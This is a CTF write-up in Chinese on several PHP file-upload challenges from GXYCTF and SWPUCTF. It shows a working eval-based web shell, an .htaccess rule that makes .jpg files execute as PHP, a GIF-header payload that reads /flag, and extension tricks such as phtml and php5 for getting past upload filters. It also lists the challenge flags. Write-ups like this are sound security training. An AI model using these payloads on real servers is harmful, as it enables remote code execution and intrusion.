[GXYCTF 2019]BabyUpload

进行测试的时候发现题目检测文件的头文件，并且一般的一句话木马被过滤了，以及过滤掉了php

所以需要使用短标签的马子

<scr​​ipt language='php'>
@eval​​(​​$_POST['cmd']);
</scr​​ipt>

然后再次上传htaccess文件对其进行解析成php

<FilesMatch "\.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

然后利用蚁剑进行连接

NSSCTF{1b7ccee0-ec96-485d-a190-cdeddf5dc737}

第二种复现

构造jpg文件的php语句如下，其show_source(“/flag”);读取/flag文件并以 PHP 语法高亮 的方式输出到页面

GIF89a
<scr​​ipt language='php'>
show_source​​​​("/flag");
</scr​​ipt>

[SWPUCTF 2021 新生赛]easyupload3.0

其先进行测试然后发现他是检测文件后缀不能有ph，因此需要利用htaccess文件将其解析为php语句

然后构造htaccess写入将其解析为php的语句

打开蚁剑然后在ven中查看flag

或者利用hackbar利用post传参得到flag,然后利用phpinfo查看版本号其中也会包含环境变量

cmd=phpinfo​​​​();

[SWPUCTF 2021 新生赛]easyupload2.0

题目过滤了php但是没有过滤phtml

发现发现根目录下没有，那应该就是在env

FLAG=NSSCTF{e66f370b-e53f-44a5-ae6c-a9a084690b8f}

[SWPUCTF 2021 新生赛]easyupload1.0

发现好像只对了php进行过滤了phtml和php5都可以上传

然后利用hackbar查看flag

NSSCTF{4725f535-3488-4301-8b7c-f092450834ae}